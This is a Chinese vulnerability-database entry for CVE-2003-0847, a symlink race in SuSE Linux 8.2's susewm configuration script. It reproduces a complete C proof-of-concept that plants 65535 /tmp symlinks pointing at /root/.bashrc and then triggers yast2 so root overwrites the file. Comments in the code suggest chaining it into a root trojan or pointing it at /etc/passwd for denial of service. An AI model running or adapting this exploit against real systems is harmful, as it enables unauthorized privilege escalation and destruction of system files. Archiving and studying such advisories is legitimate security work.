SuSE Linux 漏洞

SuSE Linux 漏洞

漏洞ID 1107505 漏洞类型 未知
发布时间 2003-10-06 更新时间 2003-11-17
图片[1]-SuSE Linux 漏洞-安全小百科CVE编号 CVE-2003-0847
图片[2]-SuSE Linux 漏洞-安全小百科CNNVD-ID CNNVD-200311-031
漏洞平台 Linux CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/23223
https://www.securityfocus.com/bid/87736
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-031
|漏洞详情
SuSELinux8.2Pro版本中susewm包的SuSEconfig.susewm存在漏洞。本地用户可以通过对susewm.$$临时文件的符号链接攻击浏览任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/8778/info

A problem exists in the SuSEWM configuration file used by SuSEConfig. Because of this, it may be possible for a local attacker to gain elevated privileges.

/*
 * Proof of Concept for SuSEconfig.vmware Symbolic Link. 
 * Tested on SuSE 8.2.
 * Nash Leon  - [email protected]
 *
 * Reference: 
 * http://www.security.nnov.ru/search/document.asp?docid=5216
 *
 * We Need Yast2 for elevation privilege(or wait root run then).
 * 
 * This sample create file /root/.bashrc in Suse 8.2. 
 * If you use this with kdeglobals vulnerability, you can install trojan 
 * horse in bashrc(local root is possible). Denial of Service too,
 * if you define target file /etc/passwd or other.
 *
 *
 * Thanks for Mercenaries's Club
 * http://cdm.frontthescene.com.br
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

#define  ERROR   -1
#define  TARGET  "/root/.bashrc" /* Change this for other attack */

int main(int argc, char *argv[]){
int i, first, last;
char buffer[60];


fprintf(stdout,"Proof of Concept for Symbolic Link in SuSEconfig.vmware - Suse 8.2n");
fprintf(stdout,"Mercenaries's Club - http://cdm.frontthescene.com.brn");


/* We don't need to get Current PID. Suse 8.2 is very poor em security
 * against symbolic link attacks.
 * There is not protect for creation of symbolic links in
 * /tmp. We can create 65535 files with symbolic link
 * if We wanted(this is 100% accurate).
 */

//first = getpid();


first = 0;

/* We don't need to get possible PID for Yast2 sw_single run
 * SuSE.vmware because SuSE 8.2 don't limit creation of 
 * symbolic links.
 */

last = 65535;

for(i = first; i < last + 1; i++){
bzero(buffer,50);
snprintf(buffer,59,"ln -s %s /tmp/susewm.%d",TARGET,i); // Are you hacker?:)
system(buffer);
 }



/* Run Yast2, note this need X-Window and permission.
 * This code is not for script kiddies.
 * Other attacks are possible.
 *
 * In Yast2, you will try uninstall some program.
 * When Yast2 run update tool, it will run SuSEconfig.vmware
 * as root and the specified file will be overwrite.
 */

system("/sbin/yast2 'sw_single'");

return 0;
}
|受影响的产品
SuSE Linux Desktop 8.2 Professional
|参考资料

来源:BUGTRAQ
名称:20031006LocalrootexploitinSuSELinux8.2Pro
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=106545972615578&w;=2
来源:BUGTRAQ
名称:20031006Re:LocalrootexploitinSuSELinux8.2Pro
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=106546531922379&w;=2

相关推荐: Power Server FTP Addon Remote USER/PASS Command Denial of Service Vulnerability

Power Server FTP Addon Remote USER/PASS Command Denial of Service Vulnerability 漏洞ID 1100037 漏洞类型 Failure to Handle Exceptional Co…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享